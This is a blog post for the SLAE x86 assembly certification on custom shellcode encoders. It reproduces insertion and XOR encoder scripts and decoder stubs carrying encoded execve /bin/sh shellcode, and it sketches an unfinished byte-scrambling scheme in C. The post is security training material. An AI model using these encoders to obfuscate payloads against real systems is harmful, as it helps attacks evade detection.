ASM Encoder (SLAE x86 Assignment #4)

Introduction

This is assignment #4 of the SLAE x86 Exam objectives.

Objectives

  • Create a custom encoding scheme like the “Insertion Encoder” we showed you
  • PoC with using execve-­stack as the shellcode to encode with your schema and execute

Notice

At the time of writing this I already had a shellcode published on packetstorm and exploit-db which could serve as a solution to the exercise, but for completeness of this blog post and to avoid explaining the fstenv technique for clarity purposes.

Download:

[Exploit-db]
Linux/x86 – execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)

[PacketStorm]
Linux/x86 execve /bin/sh Shellcode
70 bytes small Linux/x86 shellcode with XOR decoder stub and fstenv MMX FPU spawning a /bin/sh shell.

Building a task plan and prerequisites

Vivek provided the following python script to encode and decode shellcode values, respectively:

Insertion-Encoder.py:

#!/usr/bin/python

# Python Insertion Encoder 
import random

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
	encoded += '\\x'
	encoded += '%02x' % x
	encoded += '\\x%02x' % 0xAA

	# encoded += '\\x%02x' % random.randint(1,255)

	encoded2 += '0x'
	encoded2 += '%02x,' %x
	encoded2 += '0x%02x,' % 0xAA

	# encoded2 += '0x%02x,' % random.randint(1,255)



print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

insertion-decoder.nasm

; Filename: insertion-decoder.nasm
; Author:  Vivek Ramachandran
; Website:  http://securitytube.net
; Training: http://securitytube-training.com 
;
;
; Purpose: 

global _start			

section .text
_start:

	jmp short call_shellcode

decoder:
	pop esi
	lea edi, [esi +1]
	xor eax, eax
	mov al, 1
	xor ebx, ebx

decode: 
	mov bl, byte [esi + eax]
	xor bl, 0xaa
	jnz short EncodedShellcode
	mov bl, byte [esi + eax + 1]
	mov byte [edi], bl
	inc edi
	add al, 2
	jmp short decode	



call_shellcode:

	call decoder
	EncodedShellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa, 0xbb, 0xbb

The insertion encoder by Vivek actually adds the 0xaa byte between each of the shellcode values, while my shellcode above actually has them xor‘d against the value 0x7d.

The code for the XOR Encoder is as following:

#!/usr/bin/python

# Python XOR Encoder 

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
	# XOR Encoding 	
	y = x^0xAA
	encoded += '\\x'
	encoded += '%02x' % y

	encoded2 += '0x'
	encoded2 += '%02x,' %y


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))

Then it gets decoded via the assembly as following:

...
decoder:
	pop edi
	lea esi, [edi +8]
	xor ecx, ecx
	mov cl, 4
...
call_decoder:

	call decoder
	decoder_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa
	EncodedShellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a

In Vivek’s version of the decoder stub, using jmp-call-pop technique the value of decoder_value gets pushed into the stack, then we iterate through the EncoderShellcode 8 bytes a time and them xor the 8 bytes from teh shellcode against the value from decoder_value.

As my idea is to have somewhat of a shellcode scrambler, or at least that’s what I called it, and as it will be probably too complicated to explain all this at once, it will happen in stages. The overall idea is as following:

  • Scramble / reposition each byte of the shellcode
    • To accomplish this, we would also need to either:
      • add an additional byte pointing to the offset for each pair repositioned, OR
      • have a predefined pattern of where each-byte-goes-where
  • Add an arithmetic instruction, like XOR
  • Add an additional arithmetic instruction, like increment each byte by a provided value

The order in which the above tasks could be implemented could differ. As obviously the repositioning / scrambling of each byte is the hardest part of the exercise I decided to start with it and avoid having to debug the most complicated stuff at the end with additional encoding layer present.

The shellcode used for the purpose of the exercise will be the one spawning a /bin//sh execve shell as the exercise objective:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

However, to have an idea of what I am actually doing at the beginning I’ll use a simple pseudo-code pattern like \xAA\xBB\xCCxDD.

As the above code is 25 bytes in length, let’s use a pseudo-code up to the 25th letter:

0xAA,0xBB,0xCC,0xDD,0xEE,0xFF,0xGG,0xHH,0xII,0xJJ,0xKK,0xLL,0xMM,0xNN,0xOO,0xPP,0xQQ,0xRR,0xSS,0xTT,0xUU,0xVV,0xWW,0xXX,0xYY

Next to each shellcode byte, I will add another byte instruction containing the actual position of the original shellcode. So if \x31 is at the beginning of the shellcode, next to it I will add its offset, using 01 as the first one to avoid containing a null-byte.

0xAA,0x01, 0xBB, 0x02...

The execve shellcode becomes as following:

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

Next to each byte, we add the strings from 1 to 25 in hex:

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19

Of course this will make the size of the shellcode twice bigger, but as what we are trying to accomplish here is shellcode obfuscating and not aiming for a smaller buffer size we do not care about this.

The following C program will put the offsets as explained in a variable called shellcode_scrambled and output the result:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

unsigned char* shellcode = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

unsigned char* pos = \
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19";

void main()
{
        unsigned char* shellcode_scrambled = (char*)malloc(strlen(shellcode)*2);
        memset(shellcode_scrambled, 'a', strlen(shellcode)*2);
     
        int i = 0, a = 0;
        for (i, a; i < strlen(shellcode_scrambled); i+=2)
        {
                shellcode_scrambled[i] = shellcode[a];
                shellcode_scrambled[i+1] = pos[i];
        }
    
        printf("\n");
        for (i = 0; i < strlen(shellcode_scrambled); i++)
                printf("\\x%.02x", shellcode_scrambled[i]);

}

The resulting shellcode:

\x31\x01\xc0\x02\x50\x03\x68\x04\x2f\x05\x2f\x06\x73\x07\x68\x08\x68\x09\x2f\x0a\x62\x0b\x69\x0c\x6e\x0d\x89\x0e\xe3\x0f\x50\x10\x89\x11\xe2\x12\x53\x13\x89\x14\xe1\x15\xb0\x16\x0b\x17\xcd\x18\x80\x19

Each byte has now its index appended, and we could scramble each 2 bytes in a totally random way. This is an additional task on its own, as we have to know which byte pair has been already used and which has not in order to keep the consistency of the shellcode.

*** [WORK IN PROGRESS] ***

Download

Bindshell (fstenv eip GetPC technique) Shellcode (70 bytes, xor encoded):

PacketStormSecurity:
https://packetstormsecurity.com/files/163057/Linux-x86-execve-bin-sh-Shellcode.html

Exploit-db:
https://www.exploit-db.com/shellcodes/49976

Github:
https://github.com/d7x/shellcode/blob/main/linux/mmx-xor-decoder_eip.c





This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-34669